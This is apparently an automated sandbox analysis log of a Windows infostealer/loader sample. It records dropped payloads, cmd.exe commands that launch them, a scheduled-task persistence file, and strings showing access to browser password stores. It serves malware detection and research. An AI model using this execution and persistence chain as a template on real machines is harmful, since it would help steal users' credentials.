Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C65B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C65B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5FF280
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F35A0 0_2_6C5F35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C605477 0_2_6C605477
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66545C 0_2_6C66545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66542B 0_2_6C66542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66AC00 0_2_6C66AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635C10 0_2_6C635C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636CF0 0_2_6C636CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6064C0 0_2_6C6064C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D4D0 0_2_6C61D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD4E0 0_2_6C5FD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6534A0 0_2_6C6534A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C4A0 0_2_6C65C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606C80 0_2_6C606C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60FD00 0_2_6C60FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C620512 0_2_6C620512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61ED10 0_2_6C61ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6585F0 0_2_6C6585F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C630DD0 0_2_6C630DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C666E63 0_2_6C666E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C614640 0_2_6C614640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C642E4E 0_2_6C642E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC670 0_2_6C5FC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C619E50 0_2_6C619E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C633E50 0_2_6C633E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C659E30 0_2_6C659E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C645600 0_2_6C645600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637E10 0_2_6C637E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6676E3 0_2_6C6676E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60FEF0 0_2_6C60FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FBEF0 0_2_6C5FBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C654EA0 0_2_6C654EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65E680 0_2_6C65E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615E90 0_2_6C615E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C609F00 0_2_6C609F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637710 0_2_6C637710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C626FF0 0_2_6C626FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FDFE0 0_2_6C5FDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6477A0 0_2_6C6477A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63F070 0_2_6C63F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C618850 0_2_6C618850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D850 0_2_6C61D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B820 0_2_6C63B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C644820 0_2_6C644820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607810 0_2_6C607810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61C0E0 0_2_6C61C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6358E0 0_2_6C6358E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6650C7 0_2_6C6650C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6260A0 0_2_6C6260A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60D960 0_2_6C60D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64B970 0_2_6C64B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66B170 0_2_6C66B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61A940 0_2_6C61A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62D9B0 0_2_6C62D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635190 0_2_6C635190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C652990 0_2_6C652990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC9A0 0_2_6C5FC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639A60 0_2_6C639A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C611AF0 0_2_6C611AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63E2F0 0_2_6C63E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C638AC0 0_2_6C638AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C624AA0 0_2_6C624AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60CAB0 0_2_6C60CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C662AB0 0_2_6C662AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66BA90 0_2_6C66BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F22A0 0_2_6C5F22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C370 0_2_6C60C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5340 0_2_6C5F5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6653C8 0_2_6C6653C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FF380 0_2_6C5FF380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0019E410 12_2_0019E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D3048 12_2_001D3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00194CD0 12_2_00194CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001C7D63 12_2_001C7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D763B 12_2_001D763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00194AD0 12_2_00194AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D6EE9 12_2_001D6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D8700 12_2_001D8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D775B 12_2_001D775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D2BB0 12_2_001D2BB0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C62CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6394D0 appears 88 times
Source: file.exe, 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1822925903.000000000149E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.1869148294.000000006C875000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: file.exe Static PE information: Section: ZLIB complexity 0.99188232421875
Source: file.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: amadka[1].exe.0.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: JJEGIJEGDB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: JJEGIJEGDB.exe.0.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: explorti.exe.5.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/27@0/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C657030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C657030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1703015007.00000000229C4000.00000004.00000020.00020000.00000000.sdmp, FCAEBFIJKEBGHIDHIEGI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe Virustotal: Detection: 47%
Source: JJEGIJEGDB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: netutils.dll
